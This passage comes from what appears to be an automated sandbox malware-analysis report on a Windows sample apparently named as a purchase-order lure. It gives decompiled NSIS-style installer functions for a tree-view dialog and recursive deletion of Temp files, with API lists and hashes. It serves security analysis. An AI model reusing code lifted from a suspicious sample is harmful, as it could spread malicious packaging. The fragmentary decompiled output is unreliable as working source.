                                                                      												_t308[0] = _t308[0] & 0x000000fe;
                                                                      											}
                                                                      											if((_t287 & 0x00000040) == 0) {
                                                                      												_t205 = (_t287 & 0x00000001) + 1;
                                                                      												if((_t287 & 0x00000010) != 0) {
                                                                      													_t205 = _t205 + 3;
                                                                      												}
                                                                      											} else {
                                                                      												_t205 = 3;
                                                                      											}
                                                                      											_v64 = (_t205 << 0x0000000b | _t287 & 0x00000008) + (_t205 << 0x0000000b | _t287 & 0x00000008) | _t287 & 0x00000020;
                                                                      											SendMessageW(_v8, 0x1102, (_t287 >> 0x00000005 & 0x00000001) + 1, _v68);
                                                                      											SendMessageW(_v8, 0x113f, _t282,  &_v72);
                                                                      										}
                                                                      										_v20 = _v20 + 1;
                                                                      										_t308 =  &(_t308[0x206]);
                                                                      									} while (_v20 <  *0x42a28c);
                                                                      									goto L86;
                                                                      								} else {
                                                                      									_t309 = E004012E2( *0x423720);
                                                                      									E00401299(_t309);
                                                                      									_t216 = 0;
                                                                      									_t285 = 0;
                                                                      									if(_t309 <= _t282) {
                                                                      										L74:
                                                                      										SendMessageW(_v12, 0x14e, _t285, _t282);
                                                                      										_a16 = _t309;
                                                                      										_a8 = 0x420;
                                                                      										goto L75;
                                                                      									} else {
                                                                      										goto L71;
                                                                      									}
                                                                      									do {
                                                                      										L71:
                                                                      										if( *((intOrPtr*)(_v24 + _t216 * 4)) != _t282) {
                                                                      											_t285 = _t285 + 1;
                                                                      										}
                                                                      										_t216 = _t216 + 1;
                                                                      									} while (_t216 < _t309);
                                                                      									goto L74;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                                      							goto L91;
                                                                      						} else {
                                                                      							_t226 = SendMessageW(_v12, 0x147, _t282, _t282);
                                                                      							if(_t226 == 0xffffffff) {
                                                                      								goto L91;
                                                                      							}
                                                                      							_t310 = SendMessageW(_v12, 0x150, _t226, _t282);
                                                                      							if(_t310 == 0xffffffff ||  *((intOrPtr*)(_v24 + _t310 * 4)) == _t282) {
                                                                      								_t310 = 0x20;
                                                                      							}
                                                                      							E00401299(_t310);
                                                                      							SendMessageW(_a4, 0x420, _t282, _t310);
                                                                      							_a12 = _a12 | 0xffffffff;
                                                                      							_a16 = _t282;
                                                                      							_a8 = 0x40f;
                                                                      							goto L56;
                                                                      						}
                                                                      					}
                                                                      				} else {
                                                                      					_v32 = 0;
                                                                      					_v16 = 2;
                                                                      					 *0x42a2c0 = _t306;
                                                                      					 *0x423720 = GlobalAlloc(0x40,  *0x42a28c << 2);
                                                                      					_t252 = LoadBitmapW( *0x42a240, 0x6e);
                                                                      					 *0x423714 =  *0x423714 | 0xffffffff;
                                                                      					_t313 = _t252;
                                                                      					 *0x42371c = SetWindowLongW(_v8, 0xfffffffc, E00405388);
                                                                      					_t254 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                                      					 *0x42370c = _t254;
                                                                      					ImageList_AddMasked(_t254, _t313, 0xff00ff);
                                                                      					SendMessageW(_v8, 0x1109, 2,  *0x42370c);
                                                                      					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                                                                      						SendMessageW(_v8, 0x111b, 0x10, 0);
                                                                      					}
                                                                      					DeleteObject(_t313);
                                                                      					_t314 = 0;
                                                                      					do {
                                                                      						_t260 =  *((intOrPtr*)(_v24 + _t314 * 4));
                                                                      						if( *((intOrPtr*)(_v24 + _t314 * 4)) != _t282) {
                                                                      							if(_t314 != 0x20) {
                                                                      								_v16 = _t282;
                                                                      							}
                                                                      							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, _t282, E004063D2(_t282, _t314, _t318, _t282, _t260)), _t314);
                                                                      						}
                                                                      						_t314 = _t314 + 1;
                                                                      					} while (_t314 < 0x21);
                                                                      					_t315 = _a16;
                                                                      					_t283 = _v16;
                                                                      					_push( *((intOrPtr*)(_t315 + 0x30 + _t283 * 4)));
                                                                      					_push(0x15);
                                                                      					E00404345(_a4);
                                                                      					_push( *((intOrPtr*)(_t315 + 0x34 + _t283 * 4)));
                                                                      					_push(0x16);
                                                                      					E00404345(_a4);
                                                                      					_t316 = 0;
                                                                      					_t284 = 0;
                                                                      					if( *0x42a28c <= 0) {
                                                                      						L19:
                                                                      						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                                                                      						goto L20;
                                                                      					} else {
                                                                      						_t302 = _v20 + 8;
                                                                      						_v28 = _t302;
                                                                      						do {
                                                                      							_t270 =  &(_t302[0x10]);
                                                                      							if( *_t270 != 0) {
                                                                      								_v60 = _t270;
                                                                      								_t271 =  *_t302;
                                                                      								_t294 = 0x20;
                                                                      								_v84 = _t284;
                                                                      								_v80 = 0xffff0002;
                                                                      								_v76 = 0xd;
                                                                      								_v64 = _t294;
                                                                      								_v40 = _t316;
                                                                      								_v68 = _t271 & _t294;
                                                                      								if((_t271 & 0x00000002) == 0) {
                                                                      									if((_t271 & 0x00000004) == 0) {
                                                                      										_t273 = SendMessageW(_v8, 0x1132, 0,  &_v84); // executed
                                                                      										 *( *0x423720 + _t316 * 4) = _t273;
                                                                      									} else {
                                                                      										_t284 = SendMessageW(_v8, 0x110a, 3, _t284);
                                                                      									}
                                                                      								} else {
                                                                      									_v76 = 0x4d;
                                                                      									_v44 = 1;
                                                                      									_t276 = SendMessageW(_v8, 0x1132, 0,  &_v84);
                                                                      									_v32 = 1;
                                                                      									 *( *0x423720 + _t316 * 4) = _t276;
                                                                      									_t284 =  *( *0x423720 + _t316 * 4);
                                                                      								}
                                                                      							}
                                                                      							_t316 = _t316 + 1;
                                                                      							_t302 =  &(_v28[0x818]);
                                                                      							_v28 = _t302;
                                                                      						} while (_t316 <  *0x42a28c);
                                                                      						if(_v32 != 0) {
                                                                      							L20:
                                                                      							if(_v16 != 0) {
                                                                      								E0040437A(_v8);
                                                                      								_t282 = 0;
                                                                      								goto L23;
                                                                      							} else {
                                                                      								ShowWindow(_v12, 5);
                                                                      								E0040437A(_v12);
                                                                      								L91:
                                                                      								return E004043AC(_a8, _a12, _a16);
                                                                      							}
                                                                      						}
                                                                      						goto L19;
                                                                      					}
                                                                      				}
                                                                      			}





























































                                                                      0x00404d9f
                                                                      0x00404db0
                                                                      0x00404db5
                                                                      0x00404dbd
                                                                      0x00404dc3
                                                                      0x00404dcb
                                                                      0x00404dd9
                                                                      0x00404ddc
                                                                      0x00404ffd
                                                                      0x00405004
                                                                      0x00405018
                                                                      0x00405006
                                                                      0x00405008
                                                                      0x0040500b
                                                                      0x0040500c
                                                                      0x00405013
                                                                      0x00405013
                                                                      0x00405024
                                                                      0x00405032
                                                                      0x00405035
                                                                      0x0040504b
                                                                      0x004050c0
                                                                      0x004050c3
                                                                      0x004050c5
                                                                      0x004050cf
                                                                      0x004050dd
                                                                      0x004050dd
                                                                      0x004050df
                                                                      0x004050e9
                                                                      0x004050ef
                                                                      0x004050f2
                                                                      0x004050f5
                                                                      0x00405110
                                                                      0x004050f7
                                                                      0x00405101
                                                                      0x00405101
                                                                      0x004050f5
                                                                      0x004050e9
                                                                      0x00000000
                                                                      0x004050c3
                                                                      0x00405050
                                                                      0x0040505b
                                                                      0x00405060
                                                                      0x00405067
                                                                      0x0040506c
                                                                      0x00405070
                                                                      0x0040507b
                                                                      0x0040507b
                                                                      0x0040507f
                                                                      0x00405083
                                                                      0x00405087
                                                                      0x0040509a
                                                                      0x00405089
                                                                      0x00405089
                                                                      0x00405090
                                                                      0x00405096
                                                                      0x00405092
                                                                      0x00405092
                                                                      0x00405092
                                                                      0x00405090
                                                                      0x0040509e
                                                                      0x004050a0
                                                                      0x004050b3
                                                                      0x004050b6
                                                                      0x004050b9
                                                                      0x004050b9
                                                                      0x00405083
                                                                      0x00000000
                                                                      0x00405070
                                                                      0x00405052
                                                                      0x00405059
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405113
                                                                      0x00405113
                                                                      0x0040511a
                                                                      0x0040518b
                                                                      0x00405193
                                                                      0x0040519b
                                                                      0x0040519b
                                                                      0x004051a4
                                                                      0x004051a6
                                                                      0x004051ad
                                                                      0x004051b0
                                                                      0x004051b0
                                                                      0x004051b6
                                                                      0x004051bd
                                                                      0x004051c0
                                                                      0x004051c0
                                                                      0x004051c6
                                                                      0x004051cc
                                                                      0x004051d2
                                                                      0x004051d2
                                                                      0x004051df
                                                                      0x00405335
                                                                      0x0040533c
                                                                      0x00405359
                                                                      0x0040535f
                                                                      0x00405371
                                                                      0x00405371
                                                                      0x00000000
                                                                      0x004051e5
                                                                      0x004051e7
                                                                      0x004051ec
                                                                      0x004051f1
                                                                      0x004051f6
                                                                      0x004051f8
                                                                      0x004051f8
                                                                      0x004051f9
                                                                      0x004051fa
                                                                      0x004051fc
                                                                      0x004051fc
                                                                      0x00405204
                                                                      0x00405245
                                                                      0x00405247
                                                                      0x00405257
                                                                      0x0040525a
                                                                      0x0040525f
                                                                      0x00405266
                                                                      0x00405269
                                                                      0x0040530b
                                                                      0x00405311
                                                                      0x0040531f
                                                                      0x00405330
                                                                      0x00405330
                                                                      0x00000000
                                                                      0x0040531f
                                                                      0x0040526f
                                                                      0x00405272
                                                                      0x00405278
                                                                      0x0040527d
                                                                      0x0040527f
                                                                      0x00405281
                                                                      0x00405287
                                                                      0x0040528e
                                                                      0x00405293
                                                                      0x0040529a
                                                                      0x0040529d
                                                                      0x0040529d
                                                                      0x004052a4
                                                                      0x004052b0
                                                                      0x004052b4
                                                                      0x004052b6
                                                                      0x004052b6
                                                                      0x004052a6
                                                                      0x004052a8
                                                                      0x004052a8
                                                                      0x004052d6
                                                                      0x004052e2
                                                                      0x004052f1
                                                                      0x004052f1
                                                                      0x004052f3
                                                                      0x004052f6
                                                                      0x004052ff
                                                                      0x00000000
                                                                      0x00405206
                                                                      0x00405211
                                                                      0x00405214
                                                                      0x00405219
                                                                      0x0040521b
                                                                      0x0040521f
                                                                      0x0040522f
                                                                      0x00405239
                                                                      0x0040523b
                                                                      0x0040523e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405221
                                                                      0x00405221
                                                                      0x00405227
                                                                      0x00405229
                                                                      0x00405229
                                                                      0x0040522a
                                                                      0x0040522b
                                                                      0x00000000
                                                                      0x00405221
                                                                      0x00405204
                                                                      0x004051df
                                                                      0x00405122
                                                                      0x00000000
                                                                      0x00405138
                                                                      0x00405142
                                                                      0x00405147
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405159
                                                                      0x0040515e
                                                                      0x0040516a
                                                                      0x0040516a
                                                                      0x0040516c
                                                                      0x0040517b
                                                                      0x0040517d
                                                                      0x00405181
                                                                      0x00405184
                                                                      0x00000000
                                                                      0x00405184
                                                                      0x00405122
                                                                      0x00404de2
                                                                      0x00404de7
                                                                      0x00404df0
                                                                      0x00404df7
                                                                      0x00404e05
                                                                      0x00404e10
                                                                      0x00404e16
                                                                      0x00404e24
                                                                      0x00404e38
                                                                      0x00404e3d
                                                                      0x00404e4a
                                                                      0x00404e4f
                                                                      0x00404e65
                                                                      0x00404e76
                                                                      0x00404e83
                                                                      0x00404e83
                                                                      0x00404e86
                                                                      0x00404e8c
                                                                      0x00404e8e
                                                                      0x00404e91
                                                                      0x00404e96
                                                                      0x00404e9b
                                                                      0x00404e9d
                                                                      0x00404e9d
                                                                      0x00404ebd
                                                                      0x00404ebd
                                                                      0x00404ebf
                                                                      0x00404ec0
                                                                      0x00404ec5
                                                                      0x00404ec8
                                                                      0x00404ecb
                                                                      0x00404ecf
                                                                      0x00404ed4
                                                                      0x00404ed9
                                                                      0x00404edd
                                                                      0x00404ee2
                                                                      0x00404ee7
                                                                      0x00404ee9
                                                                      0x00404ef1
                                                                      0x00404fbc
                                                                      0x00404fcf
                                                                      0x00000000
                                                                      0x00404ef7
                                                                      0x00404efa
                                                                      0x00404efd
                                                                      0x00404f00
                                                                      0x00404f00
                                                                      0x00404f07
                                                                      0x00404f0d
                                                                      0x00404f10
                                                                      0x00404f16
                                                                      0x00404f17
                                                                      0x00404f1c
                                                                      0x00404f25
                                                                      0x00404f2c
                                                                      0x00404f2f
                                                                      0x00404f32
                                                                      0x00404f35
                                                                      0x00404f71
                                                                      0x00404f92
                                                                      0x00404f9a
                                                                      0x00404f73
                                                                      0x00404f80
                                                                      0x00404f80
                                                                      0x00404f37
                                                                      0x00404f3a
                                                                      0x00404f49
                                                                      0x00404f53
                                                                      0x00404f5b
                                                                      0x00404f62
                                                                      0x00404f6a
                                                                      0x00404f6a
                                                                      0x00404f35
                                                                      0x00404fa0
                                                                      0x00404fa1
                                                                      0x00404fad
                                                                      0x00404fad
                                                                      0x00404fba
                                                                      0x00404fd5
                                                                      0x00404fd9
                                                                      0x00404ff6
                                                                      0x00404ffb
                                                                      0x00000000
                                                                      0x00404fdb
                                                                      0x00404fe0
                                                                      0x00404fe9
                                                                      0x00405373
                                                                      0x00405385
                                                                      0x00405385
                                                                      0x00404fd9
                                                                      0x00000000
                                                                      0x00404fba
                                                                      0x00404ef1

                                                                      APIs
                                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404DA8
                                                                      • GetDlgItem.USER32(?,00000408), ref: 00404DB3
                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404DFD
                                                                      • LoadBitmapW.USER32(0000006E), ref: 00404E10
                                                                      • SetWindowLongW.USER32(?,000000FC,00405388), ref: 00404E29
                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E3D
                                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E4F
                                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404E65
                                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404E71
                                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404E83
                                                                      • DeleteObject.GDI32(00000000), ref: 00404E86
                                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EB1
                                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EBD
                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F53
                                                                      • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404F7E
                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F92
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404FC1
                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404FCF
                                                                      • ShowWindow.USER32(?,00000005), ref: 00404FE0
                                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 004050DD
                                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405142
                                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405157
                                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 0040517B
                                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040519B
                                                                      • ImageList_Destroy.COMCTL32(?), ref: 004051B0
                                                                      • GlobalFree.KERNEL32(?), ref: 004051C0
                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405239
                                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 004052E2
                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004052F1
                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00405311
                                                                      • ShowWindow.USER32(?,00000000), ref: 0040535F
                                                                      • GetDlgItem.USER32(?,000003FE), ref: 0040536A
                                                                      • ShowWindow.USER32(00000000), ref: 00405371
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                      • String ID: $M$N
                                                                      • API String ID: 1638840714-813528018
                                                                      • Opcode ID: dd7e303e7a082920acbddfa323b9c1fe09c51fd00b8ac91a0555c01a181f07cb
                                                                      • Instruction ID: 31ae2990ecb9e768136dc40aca02b7f59ce629e1f3cadc681249b7cbd6abf0de
                                                                      • Opcode Fuzzy Hash: dd7e303e7a082920acbddfa323b9c1fe09c51fd00b8ac91a0555c01a181f07cb
                                                                      • Instruction Fuzzy Hash: 09027DB0A00609EFDB209F54DC45AAE7BB5FB44354F10817AE610BA2E0C7798E52CF58
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 510 405abe-405ae4 call 405d89 513 405ae6-405af8 DeleteFileW 510->513 514 405afd-405b04 510->514 515 405c7a-405c7e 513->515 516 405b06-405b08 514->516 517 405b17-405b27 call 4063b0 514->517 518 405c28-405c2d 516->518 519 405b0e-405b11 516->519 525 405b36-405b37 call 405ccd 517->525 526 405b29-405b34 lstrcatW 517->526 518->515 521 405c2f-405c32 518->521 519->517 519->518 523 405c34-405c3a 521->523 524 405c3c-405c44 call 4066f3 521->524 523->515 524->515 534 405c46-405c5a call 405c81 call 405a76 524->534 529 405b3c-405b40 525->529 526->529 530 405b42-405b4a 529->530 531 405b4c-405b52 lstrcatW 529->531 530->531 533 405b57-405b73 lstrlenW FindFirstFileW 530->533 531->533 535 405b79-405b81 533->535 536 405c1d-405c21 533->536 550 405c72-405c75 call 405414 534->550 551 405c5c-405c5f 534->551 538 405ba1-405bb5 call 4063b0 535->538 539 405b83-405b8b 535->539 536->518 541 405c23 536->541 552 405bb7-405bbf 538->552 553 405bcc-405bd7 call 405a76 538->553 542 405c00-405c10 FindNextFileW 539->542 543 405b8d-405b95 539->543 541->518 542->535 549 405c16-405c17 FindClose 542->549 543->538 546 405b97-405b9f 543->546 546->538 546->542 549->536 550->515 551->523 556 405c61-405c70 call 405414 call 406176 551->556 552->542 557 405bc1-405bca call 405abe 552->557 561 405bf8-405bfb call 405414 553->561 562 405bd9-405bdc 553->562 556->515 557->542 561->542 565 405bf0-405bf6 562->565 566 405bde-405bee call 405414 call 406176 562->566 565->542 566->542
                                                                      C-Code - Quality: 98%
                                                                      			E00405ABE(void* __eflags, signed int _a4, signed int _a8) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				short _v556;
                                                                      				short _v558;
                                                                      				struct _WIN32_FIND_DATAW _v604;
                                                                      				signed int _t38;
                                                                      				signed int _t52;
                                                                      				signed int _t55;
                                                                      				signed int _t62;
                                                                      				void* _t64;
                                                                      				signed char _t65;
                                                                      				WCHAR* _t66;
                                                                      				void* _t67;
                                                                      				WCHAR* _t68;
                                                                      				void* _t70;
                                                                      
                                                                      				_t65 = _a8;
                                                                      				_t68 = _a4;
                                                                      				_v8 = _t65 & 0x00000004;
                                                                      				_t38 = E00405D89(__eflags, _t68);
                                                                      				_v12 = _t38;
                                                                      				if((_t65 & 0x00000008) != 0) {
                                                                      					_t62 = DeleteFileW(_t68); // executed
                                                                      					asm("sbb eax, eax");
                                                                      					_t64 =  ~_t62 + 1;
                                                                      					 *0x42a2e8 =  *0x42a2e8 + _t64;
                                                                      					return _t64;
                                                                      				}
                                                                      				_a4 = _t65;
                                                                      				_t8 =  &_a4;
                                                                      				 *_t8 = _a4 & 0x00000001;
                                                                      				__eflags =  *_t8;
                                                                      				if( *_t8 == 0) {
                                                                      					L5:
                                                                      					E004063B0(0x425730, _t68);
                                                                      					__eflags = _a4;
                                                                      					if(_a4 == 0) {
                                                                      						E00405CCD(_t68);
                                                                      					} else {
                                                                      						lstrcatW(0x425730, L"\\*.*");
                                                                      					}
                                                                      					__eflags =  *_t68;
                                                                      					if( *_t68 != 0) {
                                                                      						L10:
                                                                      						lstrcatW(_t68, 0x40a014);
                                                                      						L11:
                                                                      						_t66 =  &(_t68[lstrlenW(_t68)]);
                                                                      						_t38 = FindFirstFileW(0x425730,  &_v604);
                                                                      						_t70 = _t38;
                                                                      						__eflags = _t70 - 0xffffffff;
                                                                      						if(_t70 == 0xffffffff) {
                                                                      							L26:
                                                                      							__eflags = _a4;
                                                                      							if(_a4 != 0) {
                                                                      								_t30 = _t66 - 2;
                                                                      								 *_t30 =  *(_t66 - 2) & 0x00000000;
                                                                      								__eflags =  *_t30;
                                                                      							}
                                                                      							goto L28;
                                                                      						} else {
                                                                      							goto L12;
                                                                      						}
                                                                      						do {
                                                                      							L12:
                                                                      							__eflags = _v604.cFileName - 0x2e;
                                                                      							if(_v604.cFileName != 0x2e) {
                                                                      								L16:
                                                                      								E004063B0(_t66,  &(_v604.cFileName));
                                                                      								__eflags = _v604.dwFileAttributes & 0x00000010;
                                                                      								if(__eflags == 0) {
                                                                      									_t52 = E00405A76(__eflags, _t68, _v8);
                                                                      									__eflags = _t52;
                                                                      									if(_t52 != 0) {
                                                                      										E00405414(0xfffffff2, _t68);
                                                                      									} else {
                                                                      										__eflags = _v8 - _t52;
                                                                      										if(_v8 == _t52) {
                                                                      											 *0x42a2e8 =  *0x42a2e8 + 1;
                                                                      										} else {
                                                                      											E00405414(0xfffffff1, _t68);
                                                                      											E00406176(_t67, _t68, 0);
                                                                      										}
                                                                      									}
                                                                      								} else {
                                                                      									__eflags = (_a8 & 0x00000003) - 3;
                                                                      									if(__eflags == 0) {
                                                                      										E00405ABE(__eflags, _t68, _a8);
                                                                      									}
                                                                      								}
                                                                      								goto L24;
                                                                      							}
                                                                      							__eflags = _v558;
                                                                      							if(_v558 == 0) {
                                                                      								goto L24;
                                                                      							}
                                                                      							__eflags = _v558 - 0x2e;
                                                                      							if(_v558 != 0x2e) {
                                                                      								goto L16;
                                                                      							}
                                                                      							__eflags = _v556;
                                                                      							if(_v556 == 0) {
                                                                      								goto L24;
                                                                      							}
                                                                      							goto L16;
                                                                      							L24:
                                                                      							_t55 = FindNextFileW(_t70,  &_v604);
                                                                      							__eflags = _t55;
                                                                      						} while (_t55 != 0);
                                                                      						_t38 = FindClose(_t70);
                                                                      						goto L26;
                                                                      					}
                                                                      					__eflags =  *0x425730 - 0x5c;
                                                                      					if( *0x425730 != 0x5c) {
                                                                      						goto L11;
                                                                      					}
                                                                      					goto L10;
                                                                      				} else {
                                                                      					__eflags = _t38;
                                                                      					if(_t38 == 0) {
                                                                      						L28:
                                                                      						__eflags = _a4;
                                                                      						if(_a4 == 0) {
                                                                      							L36:
                                                                      							return _t38;
                                                                      						}
                                                                      						__eflags = _v12;
                                                                      						if(_v12 != 0) {
                                                                      							_t38 = E004066F3(_t68);
                                                                      							__eflags = _t38;
                                                                      							if(_t38 == 0) {
                                                                      								goto L36;
                                                                      							}
                                                                      							E00405C81(_t68);
                                                                      							_t38 = E00405A76(__eflags, _t68, _v8 | 0x00000001);
                                                                      							__eflags = _t38;
                                                                      							if(_t38 != 0) {
                                                                      								return E00405414(0xffffffe5, _t68);
                                                                      							}
                                                                      							__eflags = _v8;
                                                                      							if(_v8 == 0) {
                                                                      								goto L30;
                                                                      							}
                                                                      							E00405414(0xfffffff1, _t68);
                                                                      							return E00406176(_t67, _t68, 0);
                                                                      						}
                                                                      						L30:
                                                                      						 *0x42a2e8 =  *0x42a2e8 + 1;
                                                                      						return _t38;
                                                                      					}
                                                                      					__eflags = _t65 & 0x00000002;
                                                                      					if((_t65 & 0x00000002) == 0) {
                                                                      						goto L28;
                                                                      					}
                                                                      					goto L5;
                                                                      				}
                                                                      			}


















                                                                      0x00405ac8
                                                                      0x00405acd
                                                                      0x00405ad6
                                                                      0x00405ad9
                                                                      0x00405ae1
                                                                      0x00405ae4
                                                                      0x00405ae7
                                                                      0x00405aef
                                                                      0x00405af1
                                                                      0x00405af2
                                                                      0x00000000
                                                                      0x00405af2
                                                                      0x00405afd
                                                                      0x00405b00
                                                                      0x00405b00
                                                                      0x00405b00
                                                                      0x00405b04
                                                                      0x00405b17
                                                                      0x00405b1e
                                                                      0x00405b23
                                                                      0x00405b27
                                                                      0x00405b37
                                                                      0x00405b29
                                                                      0x00405b2f
                                                                      0x00405b2f
                                                                      0x00405b3c
                                                                      0x00405b40
                                                                      0x00405b4c
                                                                      0x00405b52
                                                                      0x00405b57
                                                                      0x00405b5d
                                                                      0x00405b68
                                                                      0x00405b6e
                                                                      0x00405b70
                                                                      0x00405b73
                                                                      0x00405c1d
                                                                      0x00405c1d
                                                                      0x00405c21
                                                                      0x00405c23
                                                                      0x00405c23
                                                                      0x00405c23
                                                                      0x00405c23
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405b79
                                                                      0x00405b79
                                                                      0x00405b79
                                                                      0x00405b81
                                                                      0x00405ba1
                                                                      0x00405ba9
                                                                      0x00405bae
                                                                      0x00405bb5
                                                                      0x00405bd0
                                                                      0x00405bd5
                                                                      0x00405bd7
                                                                      0x00405bfb
                                                                      0x00405bd9
                                                                      0x00405bd9
                                                                      0x00405bdc
                                                                      0x00405bf0
                                                                      0x00405bde
                                                                      0x00405be1
                                                                      0x00405be9
                                                                      0x00405be9
                                                                      0x00405bdc
                                                                      0x00405bb7
                                                                      0x00405bbd
                                                                      0x00405bbf
                                                                      0x00405bc5
                                                                      0x00405bc5
                                                                      0x00405bbf
                                                                      0x00000000
                                                                      0x00405bb5
                                                                      0x00405b83
                                                                      0x00405b8b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405b8d
                                                                      0x00405b95
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405b97
                                                                      0x00405b9f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405c00
                                                                      0x00405c08
                                                                      0x00405c0e
                                                                      0x00405c0e
                                                                      0x00405c17
                                                                      0x00000000
                                                                      0x00405c17
                                                                      0x00405b42
                                                                      0x00405b4a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405b06
                                                                      0x00405b06
                                                                      0x00405b08
                                                                      0x00405c28
                                                                      0x00405c2a
                                                                      0x00405c2d
                                                                      0x00405c7e
                                                                      0x00405c7e
                                                                      0x00405c7e
                                                                      0x00405c2f
                                                                      0x00405c32
                                                                      0x00405c3d
                                                                      0x00405c42
                                                                      0x00405c44
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405c47
                                                                      0x00405c53
                                                                      0x00405c58
                                                                      0x00405c5a
                                                                      0x00000000
                                                                      0x00405c75
                                                                      0x00405c5c
                                                                      0x00405c5f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405c64
                                                                      0x00000000
                                                                      0x00405c6b
                                                                      0x00405c34
                                                                      0x00405c34
                                                                      0x00000000
                                                                      0x00405c34
                                                                      0x00405b0e
                                                                      0x00405b11
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405b11

                                                                      APIs
                                                                      • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,75702EE0,00000000), ref: 00405AE7
                                                                      • lstrcatW.KERNEL32(00425730,\*.*), ref: 00405B2F
                                                                      • lstrcatW.KERNEL32(?,0040A014), ref: 00405B52
                                                                      • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,75702EE0,00000000), ref: 00405B58
                                                                      • FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,75702EE0,00000000), ref: 00405B68
                                                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C08
                                                                      • FindClose.KERNEL32(00000000), ref: 00405C17
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
